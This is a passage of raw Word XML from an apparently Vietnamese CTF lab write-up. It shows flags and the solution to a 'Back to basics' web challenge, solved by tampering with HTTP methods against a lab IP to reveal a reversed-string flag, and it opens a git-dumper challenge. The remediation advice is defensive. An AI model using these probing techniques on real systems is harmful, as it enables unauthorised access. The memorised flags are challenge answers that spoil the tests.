                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="914400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42867E7B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Figure 28: Hình ảnh flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAF186A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>FLAG{NEVER_TRUST_HEADERS}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24486B48" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Khuyến cáo: Thực hiện lọc gói tin và chặn đầu vào những vùng không mong muốn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09487BA8" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_heading=h.1gj8ip5fqea1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản Back to basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBC8EFC" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Back to basics - data, information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C620CE" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện bắt gói tin và chỉnh sửa nhằm điều khiển luồng để lấy thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E54EB5"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1F0967B9" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 1: Vào trang web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DCE23F" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Với trang web này, khi vừa bắt đầu vào </w:t>
      </w:r>
      <w:hyperlink r:id="rId68">
        <w:r w:rsidRPr="007913DC">
          <w:rPr>
            <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://18.195.173.237:8585/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thì chúng em đã bị chuyển hướng qua google.com. Do đó, tiến hành xem source web bằng curl</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251688960" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="1F727F21" wp14:editId="0683D462">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-161924</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>517810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="1435100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6114105" cy="1435100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E07403"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t>Figure 33: Hình ảnh source web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CF6ADD" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Khi ta bắt gói tin request thì dường như cũng không có gì để khai thác</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="0A775A58" wp14:editId="1FD191ED">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-171449</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>323199</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6114105" cy="1257300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B43569D"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t>Figure 34: Hình ảnh gói tin bắt được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315E6C99" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Với hình ảnh trên, thì ta chỉ có thể thử spam các request method (GET, POST, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>PUT,...</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) và nhận thấy rằng khi ta gọi OPTIONS request thì ta nhận được dòng 8 response mơ hồ như hình dưới</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251691008" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="45D7EE2A" wp14:editId="07D89C86">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-304799</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>723900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="1295400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="1295400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E78FFD4"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lastRenderedPageBreak/>
        <w:t>Figure 35: Hình ảnh gói options request và response tương ứng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FB1E1D"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Một ý nghĩa táo bạo rằng ta sẽ spam 1 phương thức không thức (tức 3 phương thức dòng 8 cùng lúc) trên request method để xem chuyện gì sẽ xảy ra tiếp theo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BF1DEC" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CEBA2F9" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D82C29" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E22E48E"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36: Hình ảnh nhận được khi spam</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="1BF97D4D" wp14:editId="4D48A46D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-161924</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>114300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="1714500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="20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2"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="1714500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA6F640"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Đúng như vậy, và như </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>hình 36</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thì không có chuyện gì xảy ra </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cả :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">:). Nhưng điều kỳ lạitiếp theo là ta thay đổi từ “GET POST OPTIONS” thành “POST” và đặt trạng thái kết nối là keep-alive thì phần response đã cho ta 1 đoạn code ý nghĩa như </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>hình 37</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251693056" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="76D8BEF0" wp14:editId="7421F91E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-204787</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>757238</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="1117600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="20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3"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="1117600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F41C6D9"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b/>
        </w:rPr>
        <w:t>Figure 37: Hình ảnh có hint sau quá trình spam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59764540" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đoạn code như hình trên có thể viết lại như sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294BA0F6" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>function reverse(_0xa6e5x2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556AC8BE" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">    flag = _0xa6e5x2['split</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>'](</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>'')['reverse']()['join']('')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA416E2" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0ED197" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">console['log'] = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>reverse;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="598B6080" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>console['log</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>'](</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>'ceab068d9522dc567177de8009f323b2')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5301F5C0" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D3DAC22" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tức là flag là đọc ngược lại chuỗi </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>'ceab068d9522dc567177de8009f323b2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12013E9D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Flag: 2b323f9008ed771765cd2259d860baec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CBD198" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Khuyến cáo: Thực hiện lọc đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3495C7" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E62B9CD" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C7EC463" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_heading=h.fee14pis3999" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản Maximum Courage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5640FEC7" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Maximum Courage - data, information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167AF907" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Thực hiện tải file về thông qua git-dumper để lấy thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B04821" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
